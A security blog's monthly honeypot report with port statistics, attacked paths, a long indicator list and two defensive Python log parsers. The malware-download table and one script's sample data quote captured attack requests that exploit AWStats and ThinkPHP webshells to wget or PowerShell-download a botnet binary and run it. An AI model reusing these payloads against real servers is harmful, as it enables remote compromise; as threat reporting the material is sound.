sec-chick Blog

Cyber security blog

[Honeypot Monthly Analysis] Honeypot, June: traffic to VNC on the rise

Here is the monthly honeypot analysis for June. Suricata has also been deployed starting next month, so I hope to include its analysis in next month's report.

[Honeypot Monthly Analysis] Honeypot, June
◾️Honeytrap (excluding port 80)

<Detection count>

[Figure: Honeytrap daily detection counts, June]

Detections were high on 6/9; the cause was a large volume of RDP-style traffic sent to port 14791.
Payload:
Cookie: mstshash=Test

Most of the sudden spikes are traffic aimed at RDP. Because the attacker's payoff is large if an RDP endpoint can be reached from outside, I suspect they are scanning for it periodically.
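As an added example (not part of the original post, and not the honeypot's own code), the following Python script shows one way to pick these RDP probes out of Honeytrap-style events: it checks for the TPKT/X.224 Connection Request framing plus the `Cookie: mstshash=` line, and then counts probes that landed on ports other than 3389 per day and port. The event records and the `rdp_connection_request` builder are constructed for the example; only the `mstshash=Test` cookie value comes from the post.

```python
import re
from collections import Counter
from datetime import date

MSTSHASH_RE = re.compile(rb"Cookie: mstshash=([^\r\n]*)")


def rdp_connection_request(username: bytes) -> bytes:
    """Build a minimal RDP X.224 Connection Request (TPKT + X.224 CR + mstshash cookie).
    Constructed here for the sample data; this is the first PDU RDP clients and scanners send."""
    cookie = b"Cookie: mstshash=" + username + b"\r\n"
    # X.224 CR: LI byte, then code 0xE0, DST-REF (2), SRC-REF (2), class option (1), then the cookie
    x224 = bytes([6 + len(cookie)]) + b"\xe0\x00\x00\x00\x00\x00" + cookie
    tpkt_len = 4 + len(x224)  # TPKT header: version 3, reserved, 16-bit total length
    return b"\x03\x00" + tpkt_len.to_bytes(2, "big") + x224


# Constructed sample of Honeytrap-style events: (date, destination port, first payload bytes).
SAMPLE_EVENTS = [
    (date(2019, 6, 9), 14791, rdp_connection_request(b"Test")),
    (date(2019, 6, 9), 14791, rdp_connection_request(b"Test")),
    (date(2019, 6, 9), 3389, rdp_connection_request(b"Administr")),
    (date(2019, 6, 10), 5900, b"RFB 003.008\n"),  # VNC version banner, not RDP
    (date(2019, 6, 10), 10630, rdp_connection_request(b"hello")),
    (date(2019, 6, 10), 14791, b"Cookie: mstshash=Test\r\n"),  # cookie text without TPKT/X.224 framing
]


def is_rdp_connection_request(payload: bytes) -> bool:
    """True if payload is framed as TPKT (version 3) + X.224 CR (code 0xE0) and carries an mstshash cookie.
    Requiring the framing, not just the string, avoids matching the cookie text in unrelated traffic."""
    if len(payload) < 11 or payload[0] != 0x03 or payload[5] != 0xE0:
        return False
    declared_len = int.from_bytes(payload[2:4], "big")
    # The capture may hold more than one PDU, so only require the declared length to fit.
    return declared_len <= len(payload) and MSTSHASH_RE.search(payload) is not None


def rdp_probes_off_standard_port(events, standard_port=3389):
    """Events that are RDP connection requests sent to a port other than the standard RDP port."""
    return [e for e in events if e[1] != standard_port and is_rdp_connection_request(e[2])]


def count_per_day_and_port(events):
    """Aggregate off-port RDP probes into a Counter keyed by (date, port)."""
    return Counter((d, p) for d, p, _ in rdp_probes_off_standard_port(events))


def mstshash_values(events):
    """Distinct mstshash cookie values (the username field scanners fill in) across all RDP probes."""
    values = set()
    for _, _, payload in events:
        if is_rdp_connection_request(payload):
            values.add(MSTSHASH_RE.search(payload).group(1).decode("ascii", "replace"))
    return values


if __name__ == "__main__":
    for (d, p), n in sorted(count_per_day_and_port(SAMPLE_EVENTS).items()):
        print(f"{d} port {p}: {n} RDP connection request(s)")
    print("mstshash values seen:", sorted(mstshash_values(SAMPLE_EVENTS)))
```

Running the script lists the two 6/9 probes on port 14791 and the one on port 10630; the bare cookie string on the last event is rejected because it lacks the TPKT/X.224 framing, and the VNC banner never matches. Replacing `SAMPLE_EVENTS` with events read from the honeypot's own log gives the same per-day, per-port breakdown used in the table above.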

<Detections by port, change vs. previous month (Honeytrap)>

Port   Service  Count   Change vs. previous month
5900   vnc      149714  128430
445    smb      106044  -903
23     telnet   42814   -4681
110    pop3     29107   28940
3389   rdp      8278    -28026
3306   mysql    6438    430
10630  -        6218    6215
25     smtp     3783    -1410
5432   -        3300    -21480
2323   telnet   2447    -1128

<Detections by port, change vs. 90-day average (Honeytrap)>

Port   Service  Count   Change vs. 90-day average
5900   vnc      149714  109398
445    smb      106044  633
23     telnet   42814   -8308
110    pop3     29107   27848
14791  Unknown  15851   15841
3389   rdp      8278    -6869
3306   mysql    6438    -3071
10630  Unknown  6218    6215
25     smtp     3783    1182
5432   Unknown  3300    -5132


Traffic to the VNC and POP3 ports had increased. Neither kind of traffic carried any particular content; it was just checking whether the port was open. For VNC, the detection count may have risen because of BlueKeep, the vulnerability related to remote access.
The other ports listed with service Unknown were also aimed at unauthorized access to RDP.

<Malware download, by target>

Target                Count
Realtek SDK           713
webshell              87
MVPower DVR           73
Huawei Home Device    71
Redis                 59
Android Debug Bridge  53
Weblogic              29
Linksys router        18
Apache Struts2        12
Elasticsearch         4
ZyXEL router          3
AVTECH                1

Many of the detections were attempts to download Mirai and Gafgyt targeting the Realtek SDK. There was also a fair number of webshell and Redis detections.


◾️WoWHoneypot
<Detection count>

[Figure: WoWHoneypot daily detection counts, June]


<Detections by target, TOP 10>

Target              Count
Tomcat              7362
WordPress           2138
-                   848
FreePBX             732
IP camera           284
phpMyAdmin          167
Unauthorized Relay  137
Zabbix              42
ThinkPHP            15
.env file           14

Attempts at unauthorized access to the Tomcat console continued to be detected in large numbers. On the other hand, there were also attacks aimed at IP cameras, and attacks on IoT devices appear to be gradually increasing.

<Detected paths, TOP 10>

path (wow_path_research) target CVE reference count
/manager/html Tomcat - - 7362
/wp-login.php WordPress - - 956
/ - - - 795
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 732
/tmpfs/auto.jpg IP camera - - 284
/xmlrpc.php WordPress - - 136
/wp5/wp-login.php WordPress - - 95
/wp2/wp-login.php WordPress - - 93
/forum/wp-login.php WordPress - - 90
/wp/wp-login.php WordPress - - 90

Among HTTP paths, unauthorized access to the Tomcat manager was detected far more often than any other path. Beyond that, attacks targeting FreePBX and WordPress were frequent.

<Malware download>

download URL path payload count
hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]x86 /awstatstotals/awstatstotals.php GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/ECHO/ECHOBOT.x86;%20chmod%20777%20ECHOBOT.x86;%20./ECHOBOT.x86;%20rm%20-rf%20ECHOBOT.x86;%20history%20-c;echo%20YYY;').exit().%24a[ HTTP/1.1..sort=].phpinfo().exit().$a[.User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1).Connection: Close.. 1
hxxp://fid[.]hognoob[.]se/download[.]exe /public/hydra.php GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1.Connection: Keep-Alive.Accept: */*.Accept-Language: zh-cn.Referer: hxxp://xxx.xxx.xxx.xxx:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start %SystemRoot%/Temp/yorungtvlzcwfwq13178.exe.User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1).Host: xxx.xxx.xxx.xxx.. 1
hxxp://fid[.]hognoob[.]se/download[.]exe /public/index.php GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid[.]hognoob[.]se/download[.]exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1.Connection: Keep-Alive.Accept: */*.Accept-Language: zh-cn.Referer: hxxp://xxx.xxx.xxx.xxx:80/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start %SystemRoot%/Temp/yorungtvlzcwfwq13178.exe.User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1).Host: xxx.xxx.xxx.xxx.. 1

hydra.php and index.php are webshells that were placed by earlier attacks; where the webshell is present, the malware gets downloaded through it. Since the file extension is exe, the target OS is Windows.
https://www.alibabacloud.com/blog/threat-alert-multiple-cryptocurrency-miner-botnets-start-to-exploit-the-new-thinkphp-vulnerability_594369
https://sec-owl.hatenablog.com/entry/2019/01/17/014528
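As an added example (not part of the original post, and not WoWHoneypot's own code), the following Python script parses request lines of the kind shown in the table above: it URL-decodes the request target, flags requests that carry command-execution markers together with a URL, pulls out the download URL, guesses the victim platform from the dropped file's extension (the exe-means-Windows reasoning used above), and renders the result in the hxxp:// and [.] notation the tables use. The sample lines are constructed from the hydra.php and awstatstotals entries in the table; a plain wp-login.php request is included to show the negative case.

```python
import re
from urllib.parse import unquote

# Constructed sample of WoWHoneypot-style request lines, modelled on the post's table.
SAMPLE_REQUESTS = [
    "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient)"
    ".DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');"
    "start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1",
    "GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;cd%20/tmp;%20wget%20"
    "http://31.13.195.251/ECHO/ECHOBOT.x86;%20chmod%20777%20ECHOBOT.x86;%20./ECHOBOT.x86;"
    "%20rm%20-rf%20ECHOBOT.x86;%20history%20-c;echo%20YYY;').exit().%24a[ HTTP/1.1",
    "GET /wp-login.php HTTP/1.1",
]

URL_RE = re.compile(r"https?://[^\s'\";)]+")
REQUEST_LINE_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")
# Command-execution markers seen when a webshell or RCE bug is used as a downloader.
DROPPER_MARKERS = ("wget ", "curl ", "DownloadFile(", "powershell", "passthru(", "system(", "cmd.exe")
WINDOWS_EXT = (".exe", ".dll", ".ps1", ".bat")
UNIX_EXT = (".sh", ".x86", ".x86_64", ".mips", ".mpsl", ".arm", ".arm7")


def defang(url: str) -> str:
    """Render a URL in the hxxp:// and [.] notation used in the post's tables."""
    return re.sub(r"^http", "hxxp", url).replace(".", "[.]")


def _decoded_target(request_line: str):
    m = REQUEST_LINE_RE.match(request_line)
    return unquote(m.group("target")) if m else None


def download_urls(request_line: str) -> list:
    """URL-decode the request target and return every URL embedded in it."""
    decoded = _decoded_target(request_line)
    return URL_RE.findall(decoded) if decoded else []


def is_dropper_request(request_line: str) -> bool:
    """A dropper request carries both a command-execution marker and a URL to fetch."""
    decoded = _decoded_target(request_line)
    if not decoded:
        return False
    return any(marker in decoded for marker in DROPPER_MARKERS) and URL_RE.search(decoded) is not None


def target_os(url: str) -> str:
    """Guess the victim platform from the dropped file's extension."""
    name = url.rsplit("/", 1)[-1].lower()
    if name.endswith(WINDOWS_EXT):
        return "windows"
    if name.endswith(UNIX_EXT):
        return "linux/iot"
    return "unknown"


def summarize(request_lines):
    """One record per dropper request: honeypot path hit, defanged payload URLs, guessed target OS."""
    records = []
    for line in request_lines:
        if not is_dropper_request(line):
            continue
        path = REQUEST_LINE_RE.match(line).group("target").split("?", 1)[0]
        urls = download_urls(line)
        records.append({
            "path": path,
            "urls": [defang(u) for u in urls],
            "os": sorted({target_os(u) for u in urls}),
        })
    return records


if __name__ == "__main__":
    for rec in summarize(SAMPLE_REQUESTS):
        print(rec["path"], rec["os"], ", ".join(rec["urls"]))
```

The script reports the hydra.php hit as a Windows dropper fetching hxxp://fid[.]hognoob[.]se/download[.]exe and the awstatstotals hit as a Linux/IoT dropper, while the wp-login.php request produces no record. Feeding it the honeypot's full request log yields the download URL column of the table directly, already defanged for publication.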

<IoC information>
WoWHoneypot

path target CVE reference
/ - - -
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743
/siteblog/wp-login.php WordPress - -
/myblog/wp-login.php WordPress - -
/forum1/wp-login.php WordPress - -
/WordPress9/wp-login.php WordPress - -
/WordPress8/wp-login.php WordPress - -
/WordPress7/wp-login.php WordPress - -
/WordPress6/wp-login.php WordPress - -
/WordPress4/wp-login.php WordPress - -
/WordPress3/wp-login.php WordPress - -
/WordPress2/wp-login.php WordPress - -
/WordPress1/wp-login.php WordPress - -
/wp8/wp-login.php WordPress - -
/wp7/wp-login.php WordPress - -
/wp5/wp-login.php WordPress - -
/wp4/wp-login.php WordPress - -
/wp3/wp-login.php WordPress - -
/test/wp-login.php WordPress - -
/wp1/wp-login.php WordPress - -
/site/wp-login.php WordPress - -
/blog/wp-login.php WordPress - -
/forum/wp-login.php WordPress - -
/WordPress/wp-login.php WordPress - -
/wp/wp-login.php WordPress - -
/wp-login.php WordPress - -
/favicon.ico - - -
/wp2/wp-login.php WordPress - -
hxxp://110[.]249[.]212[.]46/testget Unauthorized Relay - -
/TP/public/index.php ThinkPHP - -
/robots.txt - - -
///wp-json/wp/v2/users/ WordPress - -
/// - - -
/Temporary_Listen_Addresses/WSMAN Microsoft SharePoint  CVE-2019-0604 https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild
hxxp://172[.]247[.]32[.]25/ddd[.]html Unauthorized Relay - -
/PMA/scripts/setup.php phpMyAdmin - -
/~riba/pma/scripts/setup.php phpMyAdmin - -
/alt/sqladmin/scripts/setup.php phpMyAdmin - -
/phpMyAdmin-2.8.0.4/scripts/setup.php phpMyAdmin - -
/pyaniste/mysqladmin/scripts/setup.php phpMyAdmin - -
/admincooptel/phpMyAdmin/scripts/setup.php phpMyAdmin - -
/phpmyadmin.box25/scripts/setup.php phpMyAdmin - -
/phpmy/scripts/setup.php\ phpMyAdmin - -
/phpMyAdmin-www072510/scripts/setup.php phpMyAdmin - -
/phpmy/scripts/setup.php phpMyAdmin - -
/phpmyadmin/scripts/setup.php/index.php phpMyAdmin - -
/php/phpMyAdmin/scripts/setup.php phpMyAdmin - -
/admin/scripts/setup.php phpMyAdmin - -
/php/scripts/setup.php phpMyAdmin - -
/php-my-admin/scripts/setup.php phpMyAdmin - -
/phpMyAdmin2/scripts/setup.php phpMyAdmin - -
/sqladmin/scripts/setup.php phpMyAdmin - -
/db/scripts/setup.php phpMyAdmin - -
/websql/scripts/setup.php phpMyAdmin - -
/admin/phpmyadmin/scripts/setup.php phpMyAdmin - -
/_phpMyAdmin/scripts/setup.php phpMyAdmin - -
/configuracion/phpmyadmin/scripts/setup.php phpMyAdmin - -
/web/phpMyAdmin/scripts/setup.php phpMyAdmin - -
/pHpMyAdMiN/scripts/setup.php phpMyAdmin - -
/MySQL/scripts/setup.php phpMyAdmin - -
/mysqladmin/scripts/setup.php phpMyAdmin - -
/scripts/setup.php phpMyAdmin - -
/MyAdmin/scripts/setup.php phpMyAdmin - -
/w00tw00t.at.blackhats.romanian.anti-sec:) phpMyAdmin - -
/epgrec/do-record.sh epgrec - http://www.mda.or.jp/epgrec/index.php/epgrec%E3%81%AE%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB%E3%81%A8%E8%A8%AD%E5%AE%9A
/foltia/ foltia ANIME LOCKER - https://sec-owl.hatenablog.com/entry/2018/08/01/004310
/_async/AsyncResponseService Oracle WebLogic Server CVE-2019-2725 https://www.secure-sketch.com/blog/verify-oracle-weblogic-vulnerability
/.git/config git - -
/siteblog//wp-json/wp/v2/users/ WordPress - -
/siteblog// WordPress - -
/myblog//wp-json/wp/v2/users/ WordPress - -
/myblog// WordPress - -
/forum1//wp-json/wp/v2/users/ WordPress - -
/forum1// WordPress - -
/WordPress9//wp-json/wp/v2/users/ WordPress - -
/WordPress9// WordPress - -
/WordPress8//wp-json/wp/v2/users/ WordPress - -
/WordPress8// WordPress - -
/WordPress7//wp-json/wp/v2/users/ WordPress - -
/WordPress7// WordPress - -
/WordPress6//wp-json/wp/v2/users/ WordPress - -
/WordPress6// WordPress - -
/WordPress5//wp-json/wp/v2/users/ WordPress - -
/WordPress5// WordPress - -
/WordPress5/wp-login.php WordPress - -
/WordPress4//wp-json/wp/v2/users/ WordPress - -
/WordPress4// WordPress - -
/WordPress3//wp-json/wp/v2/users/ WordPress - -
/WordPress3// WordPress - -
/WordPress2//wp-json/wp/v2/users/ WordPress - -
/WordPress2// WordPress - -
/WordPress1//wp-json/wp/v2/users/ WordPress - -
/WordPress1// WordPress - -
/wp8//wp-json/wp/v2/users/ WordPress - -
/wp8// WordPress - -
/wp7//wp-json/wp/v2/users/ WordPress - -
/wp7// WordPress - -
/wp5//wp-json/wp/v2/users/ WordPress - -
/wp5// WordPress - -
/wp4//wp-json/wp/v2/users/ WordPress - -
/wp4// WordPress - -
/wp3//wp-json/wp/v2/users/ WordPress - -
/wp3// WordPress - -
/wp2//wp-json/wp/v2/users/ WordPress - -
/wp2// WordPress - -
/downloader/ - - -
/wp1//wp-json/wp/v2/users/ WordPress - -
/wp1// WordPress - -
/site//wp-json/wp/v2/users/ WordPress - -
/site// WordPress - -
/test//wp-json/wp/v2/users/ WordPress - -
/test// WordPress - -
/blog//wp-json/wp/v2/users WordPress - -
/blog//wp-json/wp/v2/users/ WordPress - -
/blog// WordPress - -
/forum//wp-json/wp/v2/users/ WordPress - -
/forum// WordPress - -
/WordPress//wp-json/wp/v2/users/ WordPress - -
/WordPress// WordPress - -
/wp//wp-json/wp/v2/users/ WordPress - -
/wp// WordPress - -
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized Relay - -
/Temporary_Listen_Addresses/SMSSERVICE Microsoft SharePoint  CVE-2019-0604 https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild
/manager/html Tomcat - -
/app/.env .env file - -
/phpmyadmin/index.php phpMyAdmin - -
/index.php - - -
/HNAP1 D-Link DIR-850L CVE-2015-2051 https://www.morihi-soc.net/?p=981
/evox/about Trane Tracer SC - https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327
/Nmap/folder/check1558950064 Nmap - -
/NmapUpperCheck1558950064 Nmap - -
/sdk Vmware - https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse
/nmaplowercheck1558950064 Nmap - -
/Nmap/folder/check1558937902 Nmap - -
/NmapUpperCheck1558937902 Nmap - -
/nmaplowercheck1558937902 Nmap - -
/_search Elasticsearch CVE-2015-1427 https://www.morihi-soc.net/?p=442
/autodiscover Zimbra  - https://www.exploit-db.com/exploits/46967
/HNAP1/ D-Link DIR-850L CVE-2015-2051 https://www.morihi-soc.net/?p=981
/.git/HEAD git - -
/ipc$ IPC - https://thinline196.hatenablog.com/entry/2018/09/23/153019
/webdav/ WebDAV - -
hxxp://www[.]baidu[.]com/ Unauthorized Relay - -
www.baidu.com:443 Unauthorized Relay - -
hxxp://www[.]123cha[.]com/ Unauthorized Relay - -
cn.bing.com:443 Unauthorized Relay - -
hxxp://www[.]ip[.]cn/ Unauthorized Relay - -
hxxp://123[.]125[.]114[.]144/ Unauthorized Relay - -
/tmpfs/auto.jpg IP camera - -
/admin/config.php Admin config - -
hxxp://112[.]35[.]53[.]83:8088/index[.]php Unauthorized Relay - -
hxxp://5[.]188[.]210[.]101/echo[.]php Unauthorized Relay - -
/queryUserList Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC}  - https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
/web/cgi-bin/hi3510/param.cgi Zivif Web CVE-2017-17106 https://sec-owl.hatenablog.com/entry/2018/09/24/011848
/system.ini Microsoft Windows  3.1 System - https://www.weblio.jp/content/system.ini
/device.rsp TBK Vision DVR  CVE-2018-9995 https://windabaft.co.jp/blog_ceo/?p=458
/System/configurationFile/ Hikvision IP camera - https://mogu2itachi.hatenablog.com/entry/2019/04/07/065650
/RPC2_Login dahua camera - https://gist.github.com/avelardi/1338d9d7be0344ab7f4280618930cd0d
/\cgi-bin/login.cgi CGI - -
/\cgi-bin/get_status.cgi /\cgi-bin/get_status.cgi - -
/scripts/setup.php/index.php phpMyAdmin - -
/PHPMYADMIN/scripts/setup.ph phpMyAdmin - -
/phpMyAdmin/setup.php/index.php phpMyAdmin - -
/phpmyadmin/setup.php phpMyAdmin - -
/.env .env file - -
//blog/ WordPress - -
/acadmin.php Webshell - -
/current_config/passwd dahua camera - https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
/cgi-bin/user/Config.cgi AVTECH AVN801 DVR CVE-2013-4981 https://jvndb.jvn.jp/ja/contents/2013/JVNDB-2013-006100.html
/device_description.xml UPnP - https://medium.com/@djboris/digging-into-upnp-by-searching-a-sonos-api-5e10e080a232
/login.html login Page - -
/winbox.png MikroTik - https://sec-owl.hatenablog.com/entry/2018/10/12/160525
/currentsetting.htm NETGEAR Genie - https://qiita.com/comefigo/items/e9b1bce93c1b615e5934
/qnfxcjqr Webshell - -
/fdsrwe Webshell - -
/images/logo.gif - - -
/home.asp ASP - -
/tmpfs/snap.jpg IP camera - https://www.ispyconnect.com/man.aspx?n=IPCMontor
/phpmyadmin/ phpMyAdmin - -
/sitemap.xml xml sitemap - -
/login.cgi login Page - -
/.well-known/security.txt SSL certificate - https://qiita.com/comefigo/items/e9b1bce93c1b615e5934
/mysql/admin/index.php phpMyAdmin - -
/redirect.php PHP - -
//about.php PHP - -
//admin/config.php Admin config - -
//recordings/ FreePBX - https://cute-0tter.hatenablog.com/entry/2019/02/25/235730
//a2billing/customer/templates/default/footer.tpl FreePBX - https://cute-0tter.hatenablog.com/entry/2019/02/25/235730
//vtigercrm/vtigerservice.php vtiger vtiger CRM 5.2.1 - https://www.securityfocus.com/bid/47267/info
hxxp://160[.]16[.]145[.]183/ Unauthorized Relay - -
/wp-admin/ WordPress - -
/admin.php WordPress - https://nskw-style.com/2014/diary/visualize-wp-admin-flow.html
/ccvv Unknown - -
/index.do Apache Struts2 CVE-2017-5638 https://www.morihi-soc.net/?p=654
/index.action Apache Struts2 CVE-2017-5638 https://github.com/mazen160/struts-pwn
/struts2-rest-showcase/orders.xhtml Apache Struts2 CVE-2017-5638 https://blue-blue.hatenablog.com/entry/2017/03/12/212730
/server-status Apache Server - https://github.com/mazen160/server-status_PWN
/developer/.env .env file - -
/public/.env .env file - -
/backup/.env .env file - -
/portal/.env .env file - -
/api/.env .env file - -
/mobile/.env .env file - -
/dev/.env .env file - -
/m/.env .env file - -
/admin/.env .env file - -
/web/.env .env file - -
/phpmyadmin phpMyAdmin - -
/qzone/ - - -
xui.ptlogin2.qq.com:443 Unauthorized Relay - -
/console/login/LoginForm.jsp Oracle WebLogic Server CVE-2015-4852 https://www.exploit-db.com/exploits/46628
hxxp://check[.]proxyradar[.]com/azenv[.]php Unauthorized Relay - -
/usr/share/phpmyadmin/libraries/select_lang.lib.php phpMyAdmin - -
/phpMyAdmin/scripts/db___.init.php phpMyAdmin - -
/phpMyAdmin-2.11.1-all-languages/scripts/setup.php phpMyAdmin - -
/sqladm/scripts/setup.php phpMyAdmin - -
/setup.php PHP - -
/pma2012/ phpMyAdmin - -
/pma2011/ phpMyAdmin - -
/phpadmin/scripts/setup.php phpMyAdmin - -
/phpMyAdmin-2.5.5/scripts/setup.php phpMyAdmin - -
/dbadmin/scripts/setup.php phpMyAdmin - -
/jmx-console/ Jboss CVE-2010-0738 https://www.rapid7.com/db/modules/exploit/multi/http/jboss_maindeployer
* - - -
/shop/wp-includes/wlwmanifest.xml WordPress - -
/wp-includes/wlwmanifest.xml WordPress - -
/website/wp-includes/wlwmanifest.xml WordPress - -
/cms/wp-includes/wlwmanifest.xml WordPress - -
/wp/wp-includes/wlwmanifest.xml WordPress - -
/site/wp-includes/wlwmanifest.xml WordPress - -
/dev/wp-includes/wlwmanifest.xml WordPress - -
/wwww/wp-includes/wlwmanifest.xml WordPress - -
/web/wp-includes/wlwmanifest.xml WordPress - -
/WordPress/wp-includes/wlwmanifest.xml WordPress - -
/blog/wp-includes/wlwmanifest.xml WordPress - -
/2017/wp-login.php WordPress - -
/1/wp-login.php WordPress - -
/myforum/wp-login.php WordPress - -
/teststite/wp-login.php WordPress - -
/vlog/wp-login.php WordPress - -
/shop/wp-login.php WordPress - -
/nx8j78af1b.jsp Webshell - -
/blog2/wp-login.php WordPress - -
/upload/bank-icons/bank_16.png Unknown - -
/upload/bank-icons/bank-gh.jpg Unknown - -
hxxp://api[.]ipify[.]org/ Unauthorized Relay - -
hxxp://112[.]35[.]88[.]28:8088/index[.]php Unauthorized Relay - -
/3/wp-login.php WordPress - -
/backup/ - - -
/dbadmin/ phpMyAdmin - -
/myadmin/ phpMyAdmin - -
/pma/ phpMyAdmin - -
/admin/ - - -
/db/ - - -
/mysite/wp-login.php WordPress - -
/2/wp-login.php WordPress - -
/2018/wp-login.php WordPress - -
/news/wp-login.php WordPress - -
/blog3/wp-login.php WordPress - -
/2019/wp-login.php WordPress - -
/index_main.php Unknown - -
/warning.html Unknown - -
/xmlrpc.php WordPress - -
/user/login.html Unknown - -
hxxp://185[.]172[.]110[.]221:80/proxy_get[.]php Unauthorized Relay - -
/public/hydra.php Webshell - https://sec-owl.hatenablog.com/entry/2019/01/17/014528
/public/index.php - - -
/login - - -
/backup - - -
hxxp://112[.]35[.]66[.]7:8088/index[.]php Unauthorized Relay - -
hxxp://185[.]172[.]110[.]221/check[.]php Unauthorized Relay - -
/main.php - - -
/api_jsonrpc.php Zabbix - -
/zabbix/api_jsonrpc.php Zabbix - https://www.exploit-db.com/exploits/39937
//proxies.php Zabbix - -
/zabbix//proxies.php Zabbix - -
/zabbix/jsrpc.php Zabbix - -
/jsrpc.php Zabbix - -
/zabbix//httpmon.php Zabbix - -
//httpmon.php Zabbix - -
hxxp://112[.]35[.]63[.]31:8088/index[.]php Unauthorized Relay - -
/forum1/xmlrpc.php WordPress - -
/wp8/xmlrpc.php WordPress - -
/WordPress8/xmlrpc.php WordPress - -
/siteblog/xmlrpc.php WordPress - -
/myblog/xmlrpc.php WordPress - -
/WordPress9/xmlrpc.php WordPress - -
/WordPress3/xmlrpc.php WordPress - -
/WordPress6/xmlrpc.php WordPress - -
/wp7/xmlrpc.php WordPress - -
/WordPress1/xmlrpc.php WordPress - -
/wp5/xmlrpc.php WordPress - -
/test/xmlrpc.php WordPress - -
/wp4/xmlrpc.php WordPress - -
/wp3/xmlrpc.php WordPress - -
/wp1/xmlrpc.php WordPress - -
/site/xmlrpc.php WordPress - -
/wp2/xmlrpc.php WordPress - -
/forum/xmlrpc.php WordPress - -
/wp/xmlrpc.php WordPress - -
/WordPress/xmlrpc.php WordPress - -
/WordPress7/xmlrpc.php WordPress - -
/WordPress4/xmlrpc.php WordPress - -
/WordPress2/xmlrpc.php WordPress - -
/blog/xmlrpc.php WordPress - -
/moo Unknown - -
/html/.env .env file - -
/Nmap/folder/check1560131930 Nmap - -
/NmapUpperCheck1560131930 Nmap - -
/nmaplowercheck1560131930 Nmap - -
/shell Webshell - -
//MyAdmin/scripts/setup.php phpMyAdmin - -
//phpMyAdmin/scripts/setup.php phpMyAdmin - -
//pma/scripts/setup.php phpMyAdmin - -
/CFIDE/administrator/ Adobe ColdFusion - https://www.exploit-db.com/exploits/14641
/muieblackcat Scanner - https://eromang.zataz.com/2011/08/14/suc027-muieblackcat-setup-php-web-scanner-robot/
/smartdomuspad/modules/reporting/track_import_export.php U.motion Builder  CVE-2018-7841 https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day/
/images/favicon.ico - - -
/scripts/ajaxPortal.lua VMware NSX SD-WAN Edge by VeloCloud CVE-2018-6961 https://www.exploit-db.com/exploits/44959
185.172.110.221:80 Unauthorized Relay - -
/awstatstotals/awstatstotals.php AWStats Totals CVE-2008-3922 https://www.bugsearch.net/en/11876/awstats-totals-v114-multisort-remote-command-execution-cve-2008-3922.html
/laravel/.env .env file - -
/.bitcoin/.env .env file - -
hxxp://10010[.]ah165[.]net:8088/hsp/out_of_service[.]jsp Unauthorized Relay - -
/index.html - - -
/Login.htm - - -
/PMA2005/ phpMyAdmin - -
/SQLite/main.php SQLiteManager - -
/SQLiteManager-1.2.4/main.php SQLiteManager - -
/SQLiteManager/main.php SQLiteManager - -
/agSearch/SQlite/main.php SQLiteManager - -
/hudson/script Unknown - -
/mysql-admin/ phpMyAdmin - -
/mysql/ phpMyAdmin - -
/mysqladmin/ phpMyAdmin - -
/mysqlmanager/ phpMyAdmin - -
/nagiosxi/images/loginsplash.png phpMyAdmin - -
/openserver/phpmyadmin/ phpMyAdmin - -
/p/m/a/ phpMyAdmin - -
/php-my-admin/ phpMyAdmin - -
/php-myadmin/ phpMyAdmin - -
/phpMyAdmin-2.2.3/ phpMyAdmin - -
/phpMyAdmin-2.2.6/ phpMyAdmin - -
/phpMyAdmin-2.5.1/ phpMyAdmin - -
/phpMyAdmin-2.5.4/ phpMyAdmin - -
/phpMyAdmin-2.5.5-pl1/ phpMyAdmin - -
/phpMyAdmin-2.5.5-rc1/ phpMyAdmin - -
/phpMyAdmin-2.5.5-rc2/ phpMyAdmin - -
/phpMyAdmin-2.5.5/ phpMyAdmin - -
